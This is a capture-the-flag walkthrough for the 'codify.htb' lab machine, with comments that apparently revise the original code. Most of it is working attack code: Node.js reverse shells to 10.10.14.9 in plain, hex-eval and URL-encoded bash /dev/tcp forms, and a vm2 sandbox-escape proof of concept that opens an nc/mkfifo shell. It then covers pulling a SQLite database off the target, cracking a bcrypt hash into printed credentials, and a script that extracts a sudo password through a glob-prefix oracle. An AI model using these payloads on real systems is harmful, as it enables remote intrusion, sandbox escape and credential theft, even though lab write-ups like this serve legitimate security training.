NodeJs Exploitation
Node.js exploitation to obtain a shell (notes from the `codify.htb` target; the scan below shows the Node.js/Express application on port 3000 next to the Apache instance on port 80).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
3000/tcp open http Node.js Express framework
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
// Reverse-shell payload for a Node.js process: spawns /bin/sh and bridges its
// stdio over a TCP connection back to the attacker's listener.
// Replace 10.10.14.9 / 6699 with your own listener (e.g. `nc -lvnp 6699`).
(function () {
  const net = require("net");
  const cp = require("child_process");
  const sh = cp.spawn("/bin/sh", []);
  const client = new net.Socket();

  // Once connected: socket -> shell stdin, shell stdout/stderr -> socket.
  const bridgeShellToSocket = function () {
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
  };

  // NOTE(review): no 'error' listener is attached to the socket, so a refused or
  // dropped connection raises an unhandled 'error' event in the host process.
  client.connect(6699, "10.10.14.9", bridgeShellToSocket);

  // Returning a regex keeps the evaluating code path from crashing, per the
  // original author's note; the value itself is never used.
  return /a/;
})();
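// Hex-encoded variant of the reverse-shell IIFE above, decoded at runtime and
// passed to eval(). As originally written, the bytes were listed as bare hex
// tokens inside String.fromCharCode(...) — a syntax error, since fromCharCode
// takes comma-separated numeric code units — so the payload could never run.
// The tokens are kept verbatim below and parsed as base-16 first.
const HEX_PAYLOAD =
  "28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 6e 65 74 20 3d 20 72 65 71 75 69 72 65 28 22 6e 65 74 22 29 2c 0a 20 20 20 20 20 20 20 20 63 70 20 3d 20 72 65 71 75 69 72 65 28 22 63 68 69 6c 64 5f 70 72 6f 63 65 73 73 22 29 2c 0a 20 20 20 20 20 20 20 20 73 68 20 3d 20 63 70 2e 73 70 61 77 6e 28 22 2f 62 69 6e 2f 73 68 22 2c 20 5b 5d 29 3b 0a 20 20 20 20 76 61 72 20 63 6c 69 65 6e 74 20 3d 20 6e 65 77 20 6e 65 74 2e 53 6f 63 6b 65 74 28 29 3b 0a 20 20 20 20 63 6c 69 65 6e 74 2e 63 6f 6e 6e 65 63 74 28 36 36 39 39 2c 20 22 31 30 2e 31 30 2e 31 34 2e 39 22 2c 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 63 6c 69 65 6e 74 2e 70 69 70 65 28 73 68 2e 73 74 64 69 6e 29 3b 0a 20 20 20 20 20 20 20 20 73 68 2e 73 74 64 6f 75 74 2e 70 69 70 65 28 63 6c 69 65 6e 74 29 3b 0a 20 20 20 20 20 20 20 20 73 68 2e 73 74 64 65 72 72 2e 70 69 70 65 28 63 6c 69 65 6e 74 29 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 2f 61 2f 3b 20 2f 2f 20 50 72 65 76 65 6e 74 73 20 74 68 65 20 4e 6f 64 65 2e 6a 73 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 66 72 6f 6d 20 63 72 61 73 68 69 6e 67 0a 7d 29 28 29 3b";

/**
 * Decode a whitespace-separated list of two-digit hex byte values into a string.
 * @param {string} tokens - e.g. "28 66 75"
 * @returns {string} the decoded text
 */
function decodeHexTokens(tokens) {
  return tokens
    .trim()
    .split(/\s+/)
    .map((h) => String.fromCharCode(parseInt(h, 16)))
    .join("");
}

/**
 * Execute the encoded reverse shell (call this where the target evaluates your
 * input). eval() of attacker-supplied text is the whole point of this payload;
 * never use the pattern in application code.
 */
function runEncodedShell() {
  eval(decodeHexTokens(HEX_PAYLOAD));
}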
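// Base64 variant of the same reverse-shell IIFE. The encoded blob was stripped
// from this page; regenerate it from the plaintext payload, e.g. `base64 -w0 shell.js`.
// `new Buffer(...)` is deprecated (Node DEP0005) and flagged by linters — use
// Buffer.from(). The decoded text goes to eval() by design: this is an offensive
// payload, not application code.
eval(Buffer.from("<BASE64_OF_REVERSE_SHELL_IIFE>", "base64").toString("ascii"));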
?q=require(%27child_process%27).exec(%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.9%2F6699%200%3E%261%27%22)
Decoded: `require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.9/6699 0>&1'")`. As originally written the command string was not quoted (`exec(bash -i >& ...)`), which is a JavaScript syntax error; and since `exec()` runs its argument through `/bin/sh -c`, the `>&` redirection and `/dev/tcp/` pseudo-device (both bash-only) must be wrapped in `bash -c '...'`.
// Prints who the Node.js process runs as (handy right after landing code
// execution): login shell, username and home directory, one per line.
// The `[]` argument is kept as in the original; os.userInfo() with no argument
// is the normal call and yields the same default (utf8) result.
const os = require('os');
const { shell, username, homedir } = os.userInfo([]);
for (const value of [shell, username, homedir]) {
  console.log(value);
}
// vm2 sandbox-escape PoC. It matches the publicly documented vm2 Promise-handler
// escape; confirm the installed vm2 version is actually affected before relying
// on it. What the payload does, as visible in the code below:
//  - fn() recurses until the stack overflows, so the promise `p` returned by the
//    async function rejects with the resulting error.
//  - p.constructor[Symbol.species] is what then() uses to build the derived
//    promise, so the sandbox ends up calling our FakePromise with an executor
//    created outside the sandbox.
//  - The rejection handler receives that error object; err.constructor.constructor
//    is the host Function, which yields `process` and from there child_process.
//
// NOTE(review): the callback address here is 10.10.16.8 while the rest of the
// page uses 10.10.14.9 — point it at your own listener before use.
const vm2 = require("vm2");
const sandbox = new vm2.VM();
const code = `
async function fn() {
(function stack() {
new Error().stack;
stack();
})();
}
p = fn();
p.constructor = {
[Symbol.species]: class FakePromise {
constructor(executor) {
executor(
(x) => x,
(err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.8 6699 >/tmp/f'); }
)
}
}
};
p.then();
`;
const escapeResult = sandbox.run(code);
console.log(escapeResult);
Initial Access
There is an SQLite database at `/var/www/contact/tickets.db` which contains a username and a bcrypt password hash. To copy it to the attacking machine, serve that directory from the victim and fetch the file from your host:
python3 -m http.server
Dumping it with cat only prints the raw file (shown below); read it with `sqlite3 tickets.db 'SELECT username, password FROM users'`, or `strings tickets.db` if the sqlite3 CLI is not installed:
cat tickets.db
�T5��T�format 3@ .WJ
otableticketsticketsCREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)�� tableusersusersCREATE TABLE users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE,
password TEXT
joshua : $2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2   (username joshua; bcrypt, cost factor 12 — the `$2a$12$` prefix)
��
����ua users
ickets
r]r�h%%�Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open� ;�wTom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!open
Cracking the password with John the Ripper. bcrypt at cost 12 is deliberately slow, so use a wordlist rather than a brute-force mask: `john --format=bcrypt --wordlist=<wordlist> hash.txt`, where hash.txt holds `joshua:$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2`. Recovered password:
spongebob1
Let's try SSH with the cracked credentials (joshua / spongebob1):
ssh joshua@10.10.10.239
User flag acquired. For privilege escalation, the script below assumes that joshua can run `/opt/scripts/mysql-backup.sh` via sudo and that its password check can be used as a character-by-character oracle (it sends a candidate prefix followed by `*`); verify both with `sudo -l` and by reading the script before running it.
import os
import string
import subprocess
charset = string.printable  # candidate alphabet: digits, letters, punctuation and whitespace
resfult = ""  # password prefix recovered so far (name kept as-is; the rest of the script uses it)
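def get(i):
    """Ask the sudo-able backup script whether ``i`` is a prefix of the password.

    The candidate is sent on the script's stdin with a trailing ``*``; this only
    works as a prefix oracle if the script matches the supplied value as an
    unquoted glob pattern — confirm that against /opt/scripts/mysql-backup.sh.

    The original built a shell pipeline, ``os.popen(f"echo '{i}'* | sudo ...")``:
    a candidate containing ``'`` (string.printable includes it) broke the
    quoting, and every other shell metacharacter in ``i`` was interpreted by
    the shell. The script is now invoked without a shell and fed via stdin.

    Returns True only when the second line of the script's stdout is exactly
    'Password confirmed!' (the same check as before, but without raising
    IndexError when the script prints fewer than two lines).
    """
    result = subprocess.run(
        ["sudo", "/opt/scripts/mysql-backup.sh"],
        input=f"{i}*\n",  # what `echo '{i}'*` used to pipe in
        capture_output=True,
        text=True,
    )
    lines = result.stdout.split("\n")
    return len(lines) > 1 and lines[1] == 'Password confirmed!'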
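def find_char():
    """Return the next password character, or None when no candidate is accepted.

    Appends each character of the module global ``charset`` to the prefix
    recovered so far (``resfult``) and returns the first one ``get`` confirms.

    Some candidates are skipped because they cannot be tested reliably:
    ``*``, ``?`` and ``[`` — the oracle appends ``*`` and presumably matches
    as a glob, so ``?*`` or ``**`` would be "confirmed" regardless of the real
    character and the loop would recover garbage; ``'`` — it breaks the
    single-quoted ``echo '...'`` the original ``get`` builds; and CR/LF —
    they terminate the line handed to the script. A password containing one of
    these characters cannot be recovered by this script.
    """
    unsafe = "*?['\n\r"
    for candidate in charset:
        if candidate in unsafe:
            continue
        if get(resfult + candidate):
            return candidate
    return None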
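# Recover the password one character at a time until no candidate is accepted.
# The progress print now comes after the None check: the original printed
# f"pass: {resfult + new_char}" first, so the final iteration raised
# TypeError (str + None) instead of breaking cleanly.
while True:
    new_char = find_char()
    if new_char is None:
        break
    resfult += new_char
    print(f"pass: {resfult}")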